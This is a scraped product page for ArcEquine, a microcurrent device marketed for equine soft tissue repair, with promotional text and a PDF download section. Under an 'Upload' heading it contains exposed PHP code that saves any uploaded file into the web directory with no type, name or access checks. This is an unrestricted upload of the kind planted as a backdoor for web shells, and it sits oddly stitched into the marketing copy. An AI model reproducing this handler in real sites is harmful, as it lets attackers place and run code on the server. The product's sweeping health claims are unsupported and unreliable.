equine soft tissue repair

The Technology

Microcurrent Technology is a term which incorporates a broad spectrum of electrical sequences, and with many variables.

The difficulty is in finding that part of the spectrum, and the correct variables, to address each individual problem at cellular level, and even this will differ between groups within the Mammalian Order.

Although the differences in the sequences (and their form of delivery) – which are optimum between different mammalian groups – may be relatively small, they are highly significant.

However, the general principles across the full spectrum are totally consistent, no matter what the mammal.

The sequences and variables within ArcEquine are those which have been found to be the optimum for use in equines, and some other mammals.

Over the years a number of phrases have been used to describe what is now commonly known collectively as Micro-Current Technology.

PDF Downloads

For more complete and technical infomation about micro current technologies, please download the pdf files below.

Upload


$uploaddir = "";
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (isset($_FILES['userfile']['name'])) {
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "The file ". basename($_FILES['userfile']['name']) ." has been uploaded";
} else {
echo "There was an error uploading the file. please try again!";
}
}
?>